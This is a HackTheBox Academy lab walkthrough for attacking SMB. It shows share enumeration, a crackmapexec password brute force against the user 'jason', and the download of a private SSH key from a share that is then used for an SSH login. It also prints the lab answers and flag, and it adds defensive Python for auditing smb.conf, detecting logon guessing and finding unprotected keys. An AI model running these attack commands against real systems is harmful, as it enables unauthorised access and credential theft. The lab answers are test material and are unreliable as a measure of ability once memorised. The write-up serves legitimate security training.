Attacking SMB
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Attacking Common Services
- 🔗 Link: Attacking SMB
❓Question
What is the name of the shared folder with READ permissions?
📋 Walkthrough
To identify the shared folders on the target machine, we first perform an Nmap scan to detect open ports and services.
└─$ nmap -sC -sV 10.129.203.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 15:46 UTC
Nmap scan report for 10.129.203.6
Host is up (0.026s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_ 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.95%I=7%D=3/20%Time=67DC3875%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.203\.6\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.203\.6\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1h00m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2025-03-20T14:47:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.94 seconds
From the Nmap scan, we see that SMB is running on ports 139 and 445.
Next, we use smbmap to enumerate the SMB shares and their permissions.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbmap -H 10.129.203.6
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 10.129.203.6:445 Name: 10.129.203.6 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
GGJ READ ONLY Priv
IPC$ NO ACCESS IPC Service (attcsvc-linux Samba)
[*] Closed 1 connections
The output shows that the shared folder GGJ has READ ONLY permissions.
Answer
GGJ
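The anonymous (NULL session) share listing and the "Message signing enabled but not required" line in the scan both trace back to server settings. The following is an added example, not part of the original walkthrough or the lab: a Python audit of an smb.conf for those settings. The sample configuration, including the path /srv/ggj, is constructed, since the target's real smb.conf is not shown on this page.

```python
import configparser

# Constructed smb.conf (assumption): one configuration that would expose a
# share the way the scan output above shows. Not the lab host's real file.
SAMPLE_SMB_CONF = """
[global]
    map to guest = bad user
    server signing = auto

[GGJ]
    comment = Priv
    path = /srv/ggj
    guest ok = yes
    read only = yes
"""

ENFORCING = {"mandatory", "required"}  # values treated here as enforcing signing
TRUTHY = {"yes", "true", "1", "on"}


def audit_smb_conf(text):
    """Return (section, parameter, finding) tuples for risky settings."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    # smb.conf indents its parameters; strip each line so configparser does
    # not read them as continuation lines of the previous value.
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))
    findings = []
    g = next((cp[s] for s in cp.sections() if s.lower() == "global"), {})
    if g.get("server signing", "default").lower() not in ENFORCING:
        findings.append(("global", "server signing", "signing offered, not required"))
    if g.get("map to guest", "never").lower() != "never":
        findings.append(("global", "map to guest", "some failed logons become guest"))
    if int(g.get("restrict anonymous", "0")) < 2:
        findings.append(("global", "restrict anonymous", "anonymous IPC$ allowed"))
    for name in cp.sections():
        if name.lower() == "global":
            continue
        share = cp[name]
        guest = share.get("guest ok", share.get("public", "no")).lower()
        if guest in TRUTHY:
            findings.append((name, "guest ok", "readable without credentials"))
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(*finding, sep=" | ")
```

A configuration with `server signing = mandatory`, `map to guest = never`, `restrict anonymous = 2` and no `guest ok = yes` share produces no findings.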
❓Question
What is the password for the username "jason"?
📋 Walkthrough
To find the password for the user "jason", we use crackmapexec with a password list to perform a brute-force attack.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ crackmapexec smb 10.129.203.6 -u "jason" -p pws.list --local-auth
SMB 10.129.203.6 445 ATTCSVC-LINUX [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX) (signing:False) (SMBv1:False)
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:liverpool STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:theman STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:bandit STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:dolphins STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:maddog STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:packers STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jaguar STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:lovers STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:nicholas STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:united STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:tiffany STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:maxwell STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:zzzzzz STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:nirvana STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jeremy STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:suckit STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:stupid STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:porn STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:monica STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:elephant STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:giants STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jackass STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:hotdog STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:rosebud STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:success STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:debbie STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:mountain STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:444444 STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:xxxxxxxx0 STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:warrior STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:1q2w3e4r5t STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [+] ATTCSVC-LINUX\jason:34c8zuNBo91!@28Bszh
The password for the user "jason" is found to be 34c8zuNBo91!@28Bszh.
Answer
34c8zuNBo91!@28Bszh
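On the server, a run like the one above appears as a burst of failed logons for one account from one address, followed by a success. The following is an added example, not part of the original walkthrough: Python detection logic for that pattern over JSON authentication-audit lines. The field names are modelled on Samba's JSON auth audit logging and should be checked against your Samba version; the events, the 192.0.2.x addresses, the user "alice" and the thresholds are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"

def parse_auth_events(lines):
    """Yield (time, source_ip, account, ok) from JSON auth-audit lines."""
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue  # debug headers and other non-JSON log text
        rec = json.loads(line)
        auth = rec.get("Authentication")
        if rec.get("type") != "Authentication" or not auth:
            continue
        # "ipv4:192.0.2.10:50000" -> "192.0.2.10" (drop family and port)
        ip = auth["remoteAddress"].split(":", 1)[1].rsplit(":", 1)[0]
        when = datetime.strptime(rec["timestamp"], TS_FORMAT)
        yield when, ip, auth["clientAccount"].lower(), auth["status"] == "NT_STATUS_OK"

def find_guessing(events, threshold=10, window=timedelta(minutes=5)):
    """Map (ip, account) -> details where failures inside window reach threshold."""
    recent = defaultdict(list)  # (ip, account) -> failure times still in window
    alerts = {}
    for when, ip, account, ok in sorted(events):
        key = (ip, account)
        fails = recent[key] = [t for t in recent[key] if when - t <= window]
        if not ok:
            fails.append(when)
            if len(fails) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "success_after": False})
                alert["failures"] = max(alert["failures"], len(fails))
        elif key in alerts and fails:
            alerts[key]["success_after"] = True  # a guess probably succeeded
    return alerts

def constructed_log():
    """Constructed sample: 12 wrong passwords, one success, one unrelated typo."""
    t0 = datetime(2025, 3, 20, 14, 50, tzinfo=timezone.utc)
    def rec(sec, status, ip, user):
        body = {"status": status, "remoteAddress": f"ipv4:{ip}:50000", "clientAccount": user}
        stamp = (t0 + timedelta(seconds=sec)).strftime(TS_FORMAT)
        return json.dumps({"timestamp": stamp, "type": "Authentication", "Authentication": body})
    lines = [rec(i, "NT_STATUS_WRONG_PASSWORD", "192.0.2.10", "jason") for i in range(12)]
    lines.append(rec(12, "NT_STATUS_OK", "192.0.2.10", "jason"))
    lines.append(rec(13, "NT_STATUS_WRONG_PASSWORD", "192.0.2.77", "alice"))
    return lines

if __name__ == "__main__":
    print(find_guessing(parse_auth_events(constructed_log())))
```

An alert with `success_after` set is the case to escalate: the account's password and anything it could read, such as files on a share, should be treated as exposed.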
❓Question
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.
📋 Walkthrough
First, we download the private SSH key from the SMB share using smbmap.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbmap -H 10.129.203.6 -r --download "GGJ\id_rsa" -u jason -p "34c8zuNBo91\!@28Bszh"
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: GGJ\id_rsa (3381 bytes)
[+] File output to: /home/kali/Desktop/HTB/Academy/10.129.203.6-GGJ_id_rsa
[*] Closed 1 connections
Next, we restrict the permissions on the downloaded key so that only our user can read it; ssh refuses to use a private key file that other users can access.
Finally, we use the SSH key to log in as "jason" and read the flag.txt file.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh jason@10.129.203.6 -i 10.129.203.6-GGJ_id_rsa
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 20 Mar 2025 03:01:21 PM UTC
System load: 0.0 Processes: 231
Usage of /: 25.6% of 13.72GB Users logged in: 0
Memory usage: 15% IPv4 address for ens160: 10.129.203.6
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 19 21:50:46 2022 from 10.10.14.20
$ cat flag.txt
HTB{SMB_4TT4CKS_2349872359}
$
Answer
HTB{SMB_4TT4CKS_2349872359}
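The final step worked because a private SSH key was stored on a file share and could be used without a passphrase. The following is an added example, not part of the original walkthrough: a Python audit that an administrator can run on the server against a share's export path to find private keys and report whether each is passphrase-protected. The function names are hypothetical; the OpenSSH check reads the cipher name stored at the start of the key blob.

```python
import base64
import binascii
import os
import struct

MAGIC = b"openssh-key-v1\x00"
OPENSSH_BEGIN = b"-----BEGIN OPENSSH PRIVATE KEY-----"

def openssh_cipher(data):
    """Cipher name stored in an OpenSSH-format key ('none' = no passphrase)."""
    body = b"".join(data.split(OPENSSH_BEGIN, 1)[1].split()).split(b"-----END", 1)[0]
    try:
        blob = base64.b64decode(body[:64])  # 48 bytes cover magic + cipher name
        (size,) = struct.unpack(">I", blob[len(MAGIC):len(MAGIC) + 4])
    except (binascii.Error, struct.error):
        return None
    if not blob.startswith(MAGIC):
        return None
    return blob[len(MAGIC) + 4:len(MAGIC) + 4 + size].decode("ascii", "replace")

def passphrase_protected(data):
    """None if data holds no private key, else whether the key is encrypted."""
    if OPENSSH_BEGIN in data:
        # An unparsable key is reported as unprotected so that it gets reviewed.
        return openssh_cipher(data) not in (None, "none")
    if b"-----BEGIN ENCRYPTED PRIVATE KEY-----" in data:
        return True  # PKCS#8 encrypted container
    if b"-----BEGIN" in data and b"PRIVATE KEY-----" in data:
        return b"Proc-Type: 4,ENCRYPTED" in data  # legacy PEM encryption header
    return None

def find_private_keys(share_root):
    """Return sorted (relative_path, protected) for keys under a share path."""
    hits = []
    for dirpath, _dirs, files in os.walk(share_root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    state = passphrase_protected(fh.read(65536))
            except OSError:
                continue  # unreadable file: skip rather than abort the audit
            if state is not None:
                hits.append((os.path.relpath(path, share_root), state))
    return sorted(hits)
```

Any hit with `protected` set to False is a usable credential for whoever can read the share; remove it from the share and rotate the key pair.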